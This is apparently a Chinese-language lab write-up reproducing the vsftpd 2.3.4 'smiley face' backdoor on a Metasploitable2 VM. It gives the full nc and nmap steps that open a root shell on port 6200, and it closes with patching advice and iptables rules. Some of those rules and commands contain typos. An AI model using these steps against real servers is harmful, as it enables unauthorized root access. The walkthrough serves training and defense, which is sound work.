Ftp笑脸漏洞复现(后门漏洞)

目录

漏洞简介:

   这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞

实验环境:

实验准备

实验过程

小总结


 

漏洞简介:

   这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞

实验环境:

攻击机:kali  虚拟机            靶机:Metasplotable2-Linux

虚拟机的网络连接都选择 NAT模式

Ftp笑脸漏洞复现(后门漏洞)_第1张图片

实验准备

①nmap命令扫描找出同网段下靶机的IP(我只开了两个虚拟机,所以我nmap出来的两个ip除了主机就是靶机,其目的最终只是要找到靶机ip,可以有多种途径)

nmap 192.xxx.xxx.0/24   (这里192.xxx.xxx是网段,即IP192.xxx.xxx.xxx的前三部分,该命令用来扫描相同网段下存活的主机)

Ftp笑脸漏洞复现(后门漏洞)_第2张图片

 得到靶机ip并发现打开着21ftp服务端口

②获取版本号

nmap -sV 靶机的ip地址

Ftp笑脸漏洞复现(后门漏洞)_第3张图片

发现是21端口那里使用的ftp服务是 vsftpd 2.3.4版本,所以知道靶机有笑脸漏洞

实验过程

 
kali终端依次输入命令:nc 目标靶机ip地址 21

                 user a:) 	(用户名必须带笑脸即 ":)" )
                 pass 1111 	(密码随意)

② 开启一个新的kali窗口输入下面命令

namp -p 6200 目标靶机的ip地址

在①操作登陆前和登陆后6200端口开放的情况

Ftp笑脸漏洞复现(后门漏洞)_第4张图片 

Ftp笑脸漏洞复现(后门漏洞)_第5张图片 

 

③输入命令连接6200端口后门

nc 目标靶机ip 6200

 Ftp笑脸漏洞复现(后门漏洞)_第6张图片

如上就是连接上6200端口,证明漏洞复现成功了,就是靶机的root管理员了,相当于利用漏洞获取了靶机管理权

小总结

一些服务的版本的更新换代是解决已发现的一些漏洞来提高安全保障,像这个带有vsftpd 2.3.4版本的服务器的21端口就已经是很久远的漏洞了,早已被修复,只能用来做训练,但我们要知道的是我们要及时更新

②一些防范后门措施

安全配置

防火墙 (解决后门)

iptables -A INPUT -p tcp -dport 6200 -j DROP
建立入站规则,不能从6200号端口进来
iptables -A OUTPUT -p tcp sport 6200 -j DROP
建立出站规则,不能从6200号端口出去

 

 

你可能感兴趣的:(安全,服务器,web安全)